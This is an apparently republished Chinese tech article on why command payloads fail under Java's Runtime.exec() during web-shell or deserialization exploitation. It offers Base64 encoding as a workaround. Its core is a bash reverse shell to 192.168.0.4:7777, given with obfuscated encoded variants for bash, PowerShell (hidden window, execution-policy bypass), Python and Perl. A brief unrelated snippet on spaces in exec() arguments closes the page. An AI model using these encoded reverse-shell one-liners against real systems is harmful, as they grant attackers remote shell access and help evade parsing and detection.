您好,登錄后才能下訂單哦!
小編給大家分享一下java.lang.Runtime.exec() Payload知識點的示例分析,希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!
有時,通過Runtime.getRuntime().exec()執(zhí)行命令的有效負載有時會失敗。使用Web Shell,反序列化利用或通過其他媒介時,可能會發(fā)生這種情況。
有時這是因為重定向和管道字符的使用在啟動過程的上下文中沒有意義。例如,在shell中執(zhí)行l(wèi)s> dir_listing會將當(dāng)前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數(shù)的上下文中,該命令將被解釋為獲取>和dir_listing目錄的列表。
有時,StringTokenizer類會破壞其中包含空格的參數(shù),該類將命令字符串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。
借助Base64編碼,下面的轉(zhuǎn)換器可以幫助減少這些問題。它可以通過調(diào)用Bash或PowerShell來制作管道并重新定向,還可以確保參數(shù)內(nèi)沒有空格。
樣例:
bash -i >& /dev/tcp/192.168.0.4/7777 0>&1
編碼后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i} #bash powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA== #powershell python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64')) #python perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=')) #perl
中間的字符均為“base64”編碼。
知識點擴展:
java.lang.Runtime.getRuntime().exec(cmd)命令中參數(shù)不能用空格怎么辦?
項目中無法執(zhí)行c程序,猜測是exec()函數(shù)的問題
String cmd= exe_path + " " +video + " " +host + ":" + port;
Process process = runtime.exec(cmd);
看完了這篇文章,相信你對“java.lang.Runtime.exec() Payload知識點的示例分析”有了一定的了解,如果想了解更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。